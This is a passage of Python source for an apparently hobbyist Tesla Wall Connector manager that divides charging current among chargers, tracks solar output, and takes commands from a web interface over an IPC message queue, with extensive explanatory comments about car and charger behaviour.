elif(now - timeLastGreenEnergyCheck > 30):
timeLastGreenEnergyCheck = now
# Don't bother to check solar generation before 6am or after
# 8pm. Sunrise in most U.S. areas varies from a little before
# 6am in Jun to almost 7:30am in Nov before the clocks get set
# back an hour. Sunset can be ~4:30pm to just after 8pm.
if(ltNow.tm_hour < 6 or ltNow.tm_hour >= 20):
maxAmpsToDivideAmongSlaves = 0
else:
queue_background_task({'cmd':'checkGreenEnergy'})
# Use backgroundTasksLock to prevent the background thread from changing
# the value of maxAmpsToDivideAmongSlaves after we've checked the value
# is safe to use but before we've used it.
backgroundTasksLock.acquire()
if(maxAmpsToDivideAmongSlaves > wiringMaxAmpsAllTWCs):
# Never tell the slaves to draw more amps than the physical charger
# wiring can handle.
if(debugLevel >= 1):
print(time_now() +
" ERROR: maxAmpsToDivideAmongSlaves " + str(maxAmpsToDivideAmongSlaves) +
" > wiringMaxAmpsAllTWCs " + str(wiringMaxAmpsAllTWCs) +
".\nSee notes above wiringMaxAmpsAllTWCs in the 'Configuration parameters' section.")
maxAmpsToDivideAmongSlaves = wiringMaxAmpsAllTWCs
# Determine how many cars are charging and how many amps they're using
numCarsCharging = 1
desiredAmpsOffered = maxAmpsToDivideAmongSlaves
for slaveTWC in slaveTWCRoundRobin:
if(slaveTWC.TWCID != self.TWCID):
# To avoid exceeding maxAmpsToDivideAmongSlaves, we must
# subtract the actual amps being used by this TWC from the amps
# we will offer.
desiredAmpsOffered -= slaveTWC.reportedAmpsActual
if(slaveTWC.reportedAmpsActual >= 1.0):
numCarsCharging += 1
# Allocate this slave a fraction of maxAmpsToDivideAmongSlaves divided
# by the number of cars actually charging.
fairShareAmps = int(maxAmpsToDivideAmongSlaves / numCarsCharging)
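        # Example: with maxAmpsToDivideAmongSlaves = 40 and 3 cars charging,
        # fairShareAmps = int(40 / 3) = 13, which caps desiredAmpsOffered for
        # this TWC at this point in the calculation.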
if(desiredAmpsOffered > fairShareAmps):
desiredAmpsOffered = fairShareAmps
if(debugLevel >= 10):
print("desiredAmpsOffered reduced from " + str(maxAmpsToDivideAmongSlaves)
+ " to " + str(desiredAmpsOffered)
+ " with " + str(numCarsCharging)
+ " cars charging.")
backgroundTasksLock.release()
minAmpsToOffer = minAmpsPerTWC
if(self.minAmpsTWCSupports > minAmpsToOffer):
minAmpsToOffer = self.minAmpsTWCSupports
if(desiredAmpsOffered < minAmpsToOffer):
if(maxAmpsToDivideAmongSlaves / numCarsCharging > minAmpsToOffer):
# There is enough power available to give each car
# minAmpsToOffer, but currently-charging cars are leaving us
# less power than minAmpsToOffer to give this car.
#
# minAmpsToOffer is based on minAmpsPerTWC which is
# user-configurable, whereas self.minAmpsTWCSupports is based on
# the minimum amps TWC must be set to reliably start a car
# charging.
#
# Unfortunately, we can't tell if a car is plugged in or wanting
# to charge without offering it minAmpsTWCSupports. As the car
# gradually starts to charge, we will see it using power and
# tell other TWCs on the network to use less power. This could
# cause the sum of power used by all TWCs to exceed
# wiringMaxAmpsAllTWCs for a few seconds, but I don't think
# exceeding by up to minAmpsTWCSupports for such a short period
# of time will cause problems.
if(debugLevel >= 10):
print("desiredAmpsOffered increased from " + str(desiredAmpsOffered)
+ " to " + str(self.minAmpsTWCSupports)
+ " (self.minAmpsTWCSupports)")
desiredAmpsOffered = self.minAmpsTWCSupports
else:
# There is not enough power available to give each car
# minAmpsToOffer, so don't offer power to any cars. Alternately,
# we could charge one car at a time and switch cars
# periodically, but I'm not going to try to implement that.
#
# Note that 5A is the lowest value you can set using the Tesla car's
                # main screen, so lower values might have some adverse effect on the
# car. I actually tried lower values when the sun was providing
# under 5A of power and found the car would occasionally set itself
# to state 03 and refuse to charge until you re-plugged the charger
# cable. Clicking "Start charging" in the car's UI or in the phone
# app would not start charging.
#
# A 5A charge only delivers ~3 miles of range to the car per hour,
# but it forces the car to remain "on" at a level that it wastes
# some power while it's charging. The lower the amps, the more power
# is wasted. This is another reason not to go below 5A.
#
# So if there isn't at least 5A of power available, pass 0A as the
# desired value. This tells the car to stop charging and it will
# enter state 03 and go to sleep. You will hear the power relay in
# the TWC turn off. When desiredAmpsOffered trends above 6A again,
# it tells the car there's power.
# If a car is set to energy saver mode in the car's UI, the car
# seems to wake every 15 mins or so (unlocking or using phone app
# also wakes it) and next time it wakes, it will see there's power
# and start charging. Without energy saver mode, the car should
# begin charging within about 10 seconds of changing this value.
if(debugLevel >= 10):
print("desiredAmpsOffered reduced to 0 from " + str(desiredAmpsOffered)
+ " because maxAmpsToDivideAmongSlaves "
+ str(maxAmpsToDivideAmongSlaves)
+ " / numCarsCharging " + str(numCarsCharging)
+ " < minAmpsToOffer " + str(minAmpsToOffer))
desiredAmpsOffered = 0
if(
self.lastAmpsOffered > 0
and
(
now - self.timeLastAmpsOfferedChanged < 60
or
now - self.timeReportedAmpsActualChangedSignificantly < 60
or
self.reportedAmpsActual < 4.0
)
):
# We were previously telling the car to charge but now we want
# to tell it to stop. However, it's been less than a minute
# since we told it to charge or since the last significant
# change in the car's actual power draw or the car has not yet
# started to draw at least 5 amps (telling it 5A makes it
# actually draw around 4.18-4.27A so we check for
# self.reportedAmpsActual < 4.0).
#
# Once we tell the car to charge, we want to keep it going for
                # at least a minute before turning it off again. The concern is that
# yanking the power at just the wrong time during the
# start-charge negotiation could put the car into an error state
# where it won't charge again without being re-plugged. This
# concern is hypothetical and most likely could not happen to a
# real car, but I'd rather not take any chances with getting
# someone's car into a non-charging state so they're stranded
# when they need to get somewhere. Note that non-Tesla cars
# using third-party adapters to plug in are at a higher risk of
# encountering this sort of hypothetical problem.
#
# The other reason for this tactic is that in the minute we
# wait, desiredAmpsOffered might rise above 5A in which case we
# won't have to turn off the charger power at all. Avoiding too
# many on/off cycles preserves the life of the TWC's main power
# relay and may also prevent errors in the car that might be
# caused by turning its charging on and off too rapidly.
#
# Seeing self.reportedAmpsActual < 4.0 means the car hasn't
# ramped up to whatever level we told it to charge at last time.
# It may be asleep and take up to 15 minutes to wake up, see
# there's power, and start charging.
#
# Unfortunately, self.reportedAmpsActual < 4.0 can also mean the
# car is at its target charge level and may not accept power for
# days until the battery drops below a certain level. I can't
# think of a reliable way to detect this case. When the car
# stops itself from charging, we'll see self.reportedAmpsActual
# drop to near 0.0A and heartbeatData[0] becomes 03, but we can
# see the same 03 state when we tell the TWC to stop charging.
# We could record the time the car stopped taking power and
# assume it won't want more for some period of time, but we
# can't reliably detect if someone unplugged the car, drove it,
# and re-plugged it so it now needs power, or if someone plugged
# in a different car that needs power. Even if I see the car
# hasn't taken the power we've offered for the
# last hour, it's conceivable the car will reach a battery state
# where it decides it wants power the moment we decide it's safe
# to stop offering it. Thus, I think it's safest to always wait
# until the car has taken 5A for a minute before cutting power
# even if that means the car will charge for a minute when you
# first plug it in after a trip even at a time when no power
# should be available.
#
# One advantage of the above situation is that whenever you plug
# the car in, unless no power has been available since you
# unplugged, the charge port will turn green and start charging
# for a minute. This lets the owner quickly see that TWCManager
# is working properly each time they return home and plug in.
if(debugLevel >= 10):
print("Don't stop charging yet because: " +
'time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)) +
' < 60 or time - self.timeReportedAmpsActualChangedSignificantly ' +
str(int(now - self.timeReportedAmpsActualChangedSignificantly)) +
' < 60 or self.reportedAmpsActual ' + str(self.reportedAmpsActual) +
' < 4')
desiredAmpsOffered = minAmpsToOffer
else:
# We can tell the TWC how much power to use in 0.01A increments, but
# the car will only alter its power in larger increments (somewhere
# between 0.5 and 0.6A). The car seems to prefer being sent whole
# amps and when asked to adjust between certain values like 12.6A
# one second and 12.0A the next second, the car reduces its power
# use to ~5.14-5.23A and refuses to go higher. So it seems best to
# stick with whole amps.
desiredAmpsOffered = int(desiredAmpsOffered)
if(self.lastAmpsOffered == 0
and now - self.timeLastAmpsOfferedChanged < 60
):
# Keep charger off for at least 60 seconds before turning back
# on. See reasoning above where I don't turn the charger off
# till it's been on at least 60 seconds.
if(debugLevel >= 10):
print("Don't start charging yet because: " +
'self.lastAmpsOffered ' +
str(self.lastAmpsOffered) + " == 0 " +
'and time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)) +
" < 60")
desiredAmpsOffered = self.lastAmpsOffered
else:
# Mid Oct 2017, Tesla pushed a firmware update to their cars
# that seems to create the following bug:
# If you raise desiredAmpsOffered AT ALL from the car's current
# max amp limit, the car will drop its max amp limit to the 6A
# setting (5.14-5.23A actual use as reported in
# heartbeatData[2-3]). The odd fix to this problem is to tell
# the car to raise to at least spikeAmpsToCancel6ALimit for 5 or
# more seconds, then tell it to lower the limit to
# desiredAmpsOffered. Even 0.01A less than
# spikeAmpsToCancel6ALimit is not enough to cancel the 6A limit.
#
# I'm not sure how long we have to hold spikeAmpsToCancel6ALimit
# but 3 seconds is definitely not enough but 5 seconds seems to
# work. It doesn't seem to matter if the car actually hits
# spikeAmpsToCancel6ALimit of power draw. In fact, the car is
# slow enough to respond that even with 10s at 21A the most I've
# seen it actually draw starting at 6A is 13A.
if(debugLevel >= 10):
print('desiredAmpsOffered=' + str(desiredAmpsOffered) +
' spikeAmpsToCancel6ALimit=' + str(spikeAmpsToCancel6ALimit) +
' self.lastAmpsOffered=' + str(self.lastAmpsOffered) +
' self.reportedAmpsActual=' + str(self.reportedAmpsActual) +
' now - self.timeReportedAmpsActualChangedSignificantly=' +
str(int(now - self.timeReportedAmpsActualChangedSignificantly)))
if(
# If we just moved from a lower amp limit to
# a higher one less than spikeAmpsToCancel6ALimit.
(
desiredAmpsOffered < spikeAmpsToCancel6ALimit
and
desiredAmpsOffered > self.lastAmpsOffered
)
or
(
# ...or if we've been offering the car more amps than it's
# been using for at least 10 seconds, then we'll change the
# amps we're offering it. For some reason, the change in
# amps offered will get the car to up its amp draw.
#
# First, check that the car is drawing enough amps to be
# charging...
self.reportedAmpsActual > 2.0
and
# ...and car is charging at under spikeAmpsToCancel6ALimit.
# I think I've seen cars get stuck between spikeAmpsToCancel6ALimit
# and lastAmpsOffered, but more often a car will be limited
# to under lastAmpsOffered by its UI setting or by the
# charger hardware it has on board, and we don't want to
# keep reducing it to spikeAmpsToCancel6ALimit.
# If cars really are getting stuck above
# spikeAmpsToCancel6ALimit, I may need to implement a
# counter that tries spikeAmpsToCancel6ALimit only a
# certain number of times per hour.
(self.reportedAmpsActual <= spikeAmpsToCancel6ALimit)
and
# ...and car is charging at over two amps under what we
# want it to charge at. I have to use 2 amps because when
# offered, say 40A, the car charges at ~38.76A actual.
# Using a percentage instead of 2.0A doesn't work because
# 38.58/40 = 95.4% but 5.14/6 = 85.6%
(self.lastAmpsOffered - self.reportedAmpsActual) > 2.0
and
# ...and car hasn't changed its amp draw significantly in
# over 10 seconds, meaning it's stuck at its current amp
# draw.
now - self.timeReportedAmpsActualChangedSignificantly > 10
)
):
# We must set desiredAmpsOffered to a value that gets
# reportedAmpsActual (amps the car is actually using) up to
# a value near lastAmpsOffered. At the end of all these
# checks, we'll set lastAmpsOffered = desiredAmpsOffered and
# timeLastAmpsOfferedChanged if the value of lastAmpsOffered was
# actually changed.
if(self.lastAmpsOffered == spikeAmpsToCancel6ALimit
and now - self.timeLastAmpsOfferedChanged > 10):
# We've been offering the car spikeAmpsToCancel6ALimit
# for over 10 seconds but it's still drawing at least
# 2A less than spikeAmpsToCancel6ALimit. I saw this
# happen once when an error stopped the car from
# charging and when the error cleared, it was offered
# spikeAmpsToCancel6ALimit as the first value it saw.
# The car limited itself to 6A indefinitely. In this
# case, the fix is to offer it lower amps.
if(debugLevel >= 1):
print(time_now() + ': Car stuck when offered spikeAmpsToCancel6ALimit. Offering 2 less.')
desiredAmpsOffered = spikeAmpsToCancel6ALimit - 2.0
elif(now - self.timeLastAmpsOfferedChanged > 5):
# self.lastAmpsOffered hasn't gotten the car to draw
# enough amps for over 5 seconds, so try
# spikeAmpsToCancel6ALimit
desiredAmpsOffered = spikeAmpsToCancel6ALimit
else:
# Otherwise, don't change the value of lastAmpsOffered.
desiredAmpsOffered = self.lastAmpsOffered
# Note that the car should have no problem increasing max
# amps to any whole value over spikeAmpsToCancel6ALimit as
# long as it's below any upper limit manually set in the
# car's UI. One time when I couldn't get TWC to push the car
# over 21A, I found the car's UI had set itself to 21A
# despite setting it to 40A the day before. I have been
# unable to reproduce whatever caused that problem.
elif(desiredAmpsOffered < self.lastAmpsOffered):
# Tesla doesn't mind if we set a lower amp limit than the
# one we're currently using, but make sure we don't change
# limits more often than every 5 seconds. This has the side
# effect of holding spikeAmpsToCancel6ALimit set earlier for
# 5 seconds to make sure the car sees it.
if(debugLevel >= 10):
print('Reduce amps: time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)))
if(now - self.timeLastAmpsOfferedChanged < 5):
desiredAmpsOffered = self.lastAmpsOffered
# set_last_amps_offered does some final checks to see if the new
# desiredAmpsOffered is safe. It should be called after we've picked a
# final value for desiredAmpsOffered.
desiredAmpsOffered = self.set_last_amps_offered(desiredAmpsOffered)
# See notes in send_slave_heartbeat() for details on how we transmit
# desiredAmpsOffered and the meaning of the code in
# self.masterHeartbeatData[0].
#
# Rather than only sending desiredAmpsOffered when slave is sending code
# 04 or 08, it seems to work better to send desiredAmpsOffered whenever
# it does not equal self.reportedAmpsMax reported by the slave TWC.
# Doing it that way will get a slave charging again even when it's in
# state 00 or 03 which it swings between after you set
# desiredAmpsOffered = 0 to stop charging.
#
# I later found that a slave may end up swinging between state 01 and 03
# when desiredAmpsOffered == 0:
# S 032e 0.25/0.00A: 01 0000 0019 0000 M: 00 0000 0000 0000
# S 032e 0.25/6.00A: 03 0258 0019 0000 M: 05 0000 0000 0000
# S 032e 0.25/0.00A: 01 0000 0019 0000 M: 00 0000 0000 0000
# S 032e 0.25/6.00A: 03 0258 0019 0000 M: 05 0000 0000 0000
#
# While it's doing this, it's continuously opening and closing the relay
# on the TWC each second which makes an audible click and will wear out
# the relay. To avoid that problem, always send code 05 when
# desiredAmpsOffered == 0. In that case, slave's response should always
# look like this:
# S 032e 0.25/0.00A: 03 0000 0019 0000 M: 05 0000 0000 0000
if(self.reportedAmpsMax != desiredAmpsOffered
or desiredAmpsOffered == 0
):
desiredHundredthsOfAmps = int(desiredAmpsOffered * 100)
self.masterHeartbeatData = bytearray([(0x09 if self.protocolVersion == 2 else 0x05),
(desiredHundredthsOfAmps >> 8) & 0xFF,
desiredHundredthsOfAmps & 0xFF,
0x00,0x00,0x00,0x00,0x00,0x00])
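            # Example: desiredAmpsOffered = 40 packs as 4000 = 0x0FA0, i.e.
            # bytes 0F A0 in positions 1-2 of the heartbeat.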
else:
self.masterHeartbeatData = bytearray([0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00])
if(len(overrideMasterHeartbeatData) >= 7):
self.masterHeartbeatData = overrideMasterHeartbeatData
if(debugLevel >= 1):
self.print_status(heartbeatData)
def set_last_amps_offered(self, desiredAmpsOffered):
        # self.lastAmpsOffered should only be changed using this method.
global debugLevel
if(debugLevel >= 10):
print("set_last_amps_offered(TWCID=" + hex_str(self.TWCID) +
", desiredAmpsOffered=" + str(desiredAmpsOffered) + ")")
if(desiredAmpsOffered != self.lastAmpsOffered):
oldLastAmpsOffered = self.lastAmpsOffered
self.lastAmpsOffered = desiredAmpsOffered
# Set totalAmpsAllTWCs to the total amps all TWCs are actually using
# minus amps this TWC is using, plus amps this TWC wants to use.
totalAmpsAllTWCs = total_amps_actual_all_twcs() \
- self.reportedAmpsActual + self.lastAmpsOffered
if(totalAmpsAllTWCs > wiringMaxAmpsAllTWCs):
# totalAmpsAllTWCs would exceed wiringMaxAmpsAllTWCs if we
# allowed this TWC to use desiredAmpsOffered. Instead, try
# offering as many amps as will increase total_amps_actual_all_twcs()
# up to wiringMaxAmpsAllTWCs.
self.lastAmpsOffered = int(wiringMaxAmpsAllTWCs -
(total_amps_actual_all_twcs() - self.reportedAmpsActual))
if(self.lastAmpsOffered < self.minAmpsTWCSupports):
# Always offer at least minAmpsTWCSupports amps.
# See notes in receive_slave_heartbeat() beneath
# 'if(maxAmpsToDivideAmongSlaves / numCarsCharging > minAmpsToOffer):'
self.lastAmpsOffered = self.minAmpsTWCSupports
print("WARNING: Offering slave TWC %02X%02X %.1fA instead of " \
"%.1fA to avoid overloading wiring shared by all TWCs." % (
self.TWCID[0], self.TWCID[1], self.lastAmpsOffered, desiredAmpsOffered))
if(self.lastAmpsOffered > self.wiringMaxAmps):
# We reach this case frequently in some configurations, such as
# when two 80A TWCs share a 125A line. Therefore, don't print
# an error.
self.lastAmpsOffered = self.wiringMaxAmps
if(debugLevel >= 10):
print("Offering slave TWC %02X%02X %.1fA instead of " \
"%.1fA to avoid overloading the TWC rated at %.1fA." % (
self.TWCID[0], self.TWCID[1], self.lastAmpsOffered,
desiredAmpsOffered, self.wiringMaxAmps))
if(self.lastAmpsOffered != oldLastAmpsOffered):
self.timeLastAmpsOfferedChanged = time.time()
return self.lastAmpsOffered
#
# End TWCSlave class
#
##############################
##############################
#
# Begin global vars
#
data = ''
dataLen = 0
ignoredData = bytearray()
msg = bytearray()
msgLen = 0
lastTWCResponseMsg = None
overrideMasterHeartbeatData = b''
masterTWCID = ''
slaveHeartbeatData = bytearray([0x01,0x0F,0xA0,0x0F,0xA0,0x00,0x00,0x00,0x00])
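# The fake slave's initial heartbeat above mirrors the layout decoded in
# TWCSlave.receive_slave_heartbeat(): byte 0 is the state (01), bytes 1-2 the
# max amps and bytes 3-4 the amps in use, both 0x0FA0 = 40.00A here.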
numInitMsgsToSend = 10
msgRxCount = 0
timeLastTx = 0
slaveTWCs = {}
slaveTWCRoundRobin = []
idxSlaveToSendNextHeartbeat = 0
maxAmpsToDivideAmongSlaves = 0
scheduledAmpsMax = -1
scheduledAmpsStartHour = -1
scheduledAmpsEndHour = -1
scheduledAmpsDaysBitmap = 0x7F
chargeNowAmps = 0
chargeNowTimeEnd = 0
spikeAmpsToCancel6ALimit = 16
timeLastGreenEnergyCheck = 0
hourResumeTrackGreenEnergy = -1
kWhDelivered = 119
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()
# __file__ contains the path to the running script. Replace the script name with
# TWCManagerSettings.txt. This gives us a path that will always locate
# TWCManagerSettings.txt in the same directory as the script even when pwd does
# not match the script directory.
settingsFileName = re.sub(r'/[^/]+$', r'/TWCManagerSettings.txt', __file__)
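# Example (hypothetical path): if __file__ is /home/pi/TWCManager/TWCManager.py,
# settingsFileName becomes /home/pi/TWCManager/TWCManagerSettings.txt.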
nonScheduledAmpsMax = -1
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ''
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0
timeToRaise2A = 0
carApiLastErrorTime = 0
carApiBearerToken = ''
carApiRefreshToken = ''
carApiTokenExpireTime = time.time()
carApiLastStartOrStopChargeTime = 0
carApiVehicles = []
# Transient errors are ones that usually disappear if we retry the car API
# command a minute or less later.
# 'vehicle unavailable:' sounds like it implies the car is out of connection
# range, but I once saw it returned by drive_state after wake_up returned
# 'online'. In that case, the car is reachable, but drive_state failed for some
# reason. Thus we consider it a transient error.
# Error strings below need only match the start of an error response such as:
# {'response': None, 'error_description': '',
# 'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}'}
carApiTransientErrors = ['upstream internal error', 'operation_timedout',
'vehicle unavailable']
# Define minutes between retrying non-transient errors.
carApiErrorRetryMins = 10
homeLat = 10000
homeLon = 10000
backgroundTasksQueue = queue.Queue()
backgroundTasksCmds = {}
backgroundTasksLock = threading.Lock()
ser = None
ser = serial.Serial(rs485Adapter, baud, timeout=0)
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
load_settings()
# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args = ())
backgroundTasksThread.daemon = True
backgroundTasksThread.start()
# Create an IPC (Interprocess Communication) message queue that we can
# periodically check to respond to queries from the TWCManager web interface.
#
# These messages will contain commands like "start charging at 10A" or may ask
# for information like "how many amps is the solar array putting out".
#
# The message queue is identified by a numeric key. This script and the web
# interface must both use the same key. The "ftok" function facilitates creating
# such a key based on a shared piece of information that is not likely to
# conflict with keys chosen by any other process in the system.
#
# ftok reads the inode number of the file or directory pointed to by its first
# parameter. This file or dir must already exist and the permissions on it don't
# seem to matter. The inode of a particular file or dir is fairly unique but
# doesn't change often so it makes a decent choice for a key. We use the parent
# directory of the TWCManager script.
#
# The second parameter to ftok is a single byte that adds some additional
# uniqueness and lets you create multiple queues linked to the file or dir in
# the first param. We use 'T' for Tesla.
#
# If you can't get this to work, you can also set key = <some arbitrary number>
# and in the web interface, use the same arbitrary number. While that could
# conflict with another process, it's very unlikely to.
webIPCkey = sysv_ipc.ftok(re.sub('/[^/]+$', '/', __file__), ord('T'), True)
# Use the key to create a message queue with read/write access for all users.
webIPCqueue = sysv_ipc.MessageQueue(webIPCkey, sysv_ipc.IPC_CREAT, 0o666)
if(webIPCqueue == None):
print("ERROR: Can't create Interprocess Communication message queue to communicate with web interface.")
# After the IPC message queue is created, if you type 'sudo ipcs -q' on the
# command line, you should see something like:
# ------ Message Queues --------
# key msqid owner perms used-bytes messages
# 0x5402ed16 491520 pi 666 0 0
#
# Notice that we've created the only IPC message queue in the system. Apparently
# default software on the pi doesn't use IPC or if it does, it creates and
# deletes its message queues quickly.
#
# If you want to get rid of all queues because you created extras accidentally,
# reboot or type 'sudo ipcrm -a msg'. Don't get rid of all queues if you see
# ones you didn't create or you may crash another process.
# Find more details on IPC here:
# http://www.onlamp.com/pub/a/php/2004/05/13/shared_memory.html
print("TWC Manager starting as fake %s with id %02X%02X and sign %02X" \
% ( ("Master" if fakeMaster else "Slave"), \
ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(slaveSign)))
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if(fakeMaster == 1):
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if(numInitMsgsToSend > 5):
send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif(numInitMsgsToSend > 0):
send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if(time.time() - timeLastTx >= 1.0):
# It's been about a second since our last heartbeat.
if(len(slaveTWCRoundRobin) > 0):
slaveTWC = slaveTWCRoundRobin[idxSlaveToSendNextHeartbeat]
if(time.time() - slaveTWC.timeLastRx > 26):
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
print(time_now() + ": WARNING: We haven't heard from slave " \
"%02X%02X for over 26 seconds. " \
"Stop sending them heartbeat messages." % \
(slaveTWC.TWCID[0], slaveTWC.TWCID[1]))
delete_slave(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if(idxSlaveToSendNextHeartbeat >= len(slaveTWCRoundRobin)):
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if(fakeMaster != 2 and time.time() - timeLastTx >= 10.0):
if(debugLevel >= 1):
print("Advertise fake slave %02X%02X with sign %02X is " \
"ready to link once per 10 seconds as long as master " \
"hasn't sent a heartbeat in the last 10 seconds." % \
(ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(slaveSign)))
send_slave_linkready()
########################################################################
# See if there's any message from the web interface.
# If the message is longer than msgMaxSize, MSG_NOERROR tells it to
# return what it can of the message and discard the rest.
        # When no message is available, the non-blocking receive below raises
        # sysv_ipc.BusyError, which we catch and treat as "no message of the
        # desired type is waiting". Other IPC problems also surface as
        # sysv_ipc exceptions rather than return codes.
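        # Each queued message starts with a packed '=LH' header: a 4-byte
        # message time and a 2-byte message id, followed by the ASCII command
        # payload. The same header is packed into responses further below,
        # presumably so the web interface can match replies to requests.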
try:
webMsgRaw = webIPCqueue.receive(False, 2)
if(len(webMsgRaw[0]) > 0):
webMsgType = webMsgRaw[1]
unpacked = struct.unpack('=LH', webMsgRaw[0][0:6])
webMsgTime = unpacked[0]
webMsgID = unpacked[1]
webMsg = webMsgRaw[0][6:len(webMsgRaw[0])]
if(debugLevel >= 1):
webMsgRedacted = webMsg
# Hide car password in web request to send password to Tesla
m = re.search(b'^(carApiEmailPassword=[^\n]+\n)', webMsg, re.MULTILINE)
if(m):
webMsgRedacted = m.group(1) + b'[HIDDEN]'
print(time_now() + ": Web query: '" + str(webMsgRedacted) + "', id " + str(webMsgID) +
", time " + str(webMsgTime) + ", type " + str(webMsgType))
webResponseMsg = ''
numPackets = 0
if(webMsg == b'getStatus'):
needCarApiBearerToken = False
if(carApiBearerToken == ''):
for i in range(0, len(slaveTWCRoundRobin)):
if(slaveTWCRoundRobin[i].protocolVersion == 2):
needCarApiBearerToken = True
webResponseMsg = (
"%.2f" % (maxAmpsToDivideAmongSlaves) +
'`' + "%.2f" % (wiringMaxAmpsAllTWCs) +
'`' + "%.2f" % (minAmpsPerTWC) +
'`' + "%.2f" % (chargeNowAmps) +
'`' + str(nonScheduledAmpsMax) +
'`' + str(scheduledAmpsMax) +
'`' + "%02d:%02d" % (int(scheduledAmpsStartHour),
int((scheduledAmpsStartHour % 1) * 60)) +
'`' + "%02d:%02d" % (int(scheduledAmpsEndHour),
int((scheduledAmpsEndHour % 1) * 60)) +
'`' + str(scheduledAmpsDaysBitmap) +
'`' + "%02d:%02d" % (int(hourResumeTrackGreenEnergy),
int((hourResumeTrackGreenEnergy % 1) * 60)) +
# Send 1 if we need an email/password entered for car api, otherwise send 0
'`' + ('1' if needCarApiBearerToken else '0') +
'`' + str(len(slaveTWCRoundRobin))
)
for i in range(0, len(slaveTWCRoundRobin)):
webResponseMsg += (
'`' + "%02X%02X" % (slaveTWCRoundRobin[i].TWCID[0],
slaveTWCRoundRobin[i].TWCID[1]) +
'~' + str(slaveTWCRoundRobin[i].maxAmps) +
'~' + "%.2f" % (slaveTWCRoundRobin[i].reportedAmpsActual) +
'~' + str(slaveTWCRoundRobin[i].lastAmpsOffered) +
'~' + str(slaveTWCRoundRobin[i].reportedState)
)
elif(webMsg[0:20] == b'setNonScheduledAmps='):
m = re.search(b'([-0-9]+)', webMsg[19:len(webMsg)])
if(m):
nonScheduledAmpsMax = int(m.group(1))
# Save nonScheduledAmpsMax to SD card so the setting
# isn't lost on power failure or script restart.
save_settings()
elif(webMsg[0:17] == b'setScheduledAmps='):
m = re.search(b'([-0-9]+)\nstartTime=([-0-9]+):([0-9]+)\nendTime=([-0-9]+):([0-9]+)\ndays=([0-9]+)', \
webMsg[17:len(webMsg)], re.MULTILINE)
if(m):
scheduledAmpsMax = int(m.group(1))
scheduledAmpsStartHour = int(m.group(2)) + (int(m.group(3)) / 60)
scheduledAmpsEndHour = int(m.group(4)) + (int(m.group(5)) / 60)
scheduledAmpsDaysBitmap = int(m.group(6))
save_settings()
elif(webMsg[0:30] == b'setResumeTrackGreenEnergyTime='):
m = re.search(b'([-0-9]+):([0-9]+)', webMsg[30:len(webMsg)], re.MULTILINE)
if(m):
hourResumeTrackGreenEnergy = int(m.group(1)) + (int(m.group(2)) / 60)
save_settings()
elif(webMsg[0:11] == b'sendTWCMsg='):
m = re.search(b'([0-9a-fA-F]+)', webMsg[11:len(webMsg)], re.MULTILINE)
if(m):
twcMsg = trim_pad(bytearray.fromhex(m.group(1).decode('ascii')),
15 if len(slaveTWCRoundRobin) == 0 \
or slaveTWCRoundRobin[0].protocolVersion == 2 else 13)
if((twcMsg[0:2] == b'\xFC\x19') or (twcMsg[0:2] == b'\xFC\x1A')):
print("\n*** ERROR: Web interface requested sending command:\n"
+ hex_str(twcMsg)
+ "\nwhich could permanently disable the TWC. Aborting.\n")
elif((twcMsg[0:2] == b'\xFB\xE8')):
print("\n*** ERROR: Web interface requested sending command:\n"
+ hex_str(twcMsg)
+ "\nwhich could crash the TWC. Aborting.\n")
else:
lastTWCResponseMsg = bytearray();
send_msg(twcMsg)
elif(webMsg == b'getLastTWCMsgResponse'):
if(lastTWCResponseMsg != None and lastTWCResponseMsg != b''):
webResponseMsg = hex_str(lastTWCResponseMsg)
else:
webResponseMsg = 'None'
elif(webMsg[0:20] == b'carApiEmailPassword='):
m = re.search(b'([^\n]+)\n([^\n]+)', webMsg[20:len(webMsg)], re.MULTILINE)
if(m):
queue_background_task({'cmd':'carApiEmailPassword',
'email':m.group(1).decode('ascii'),
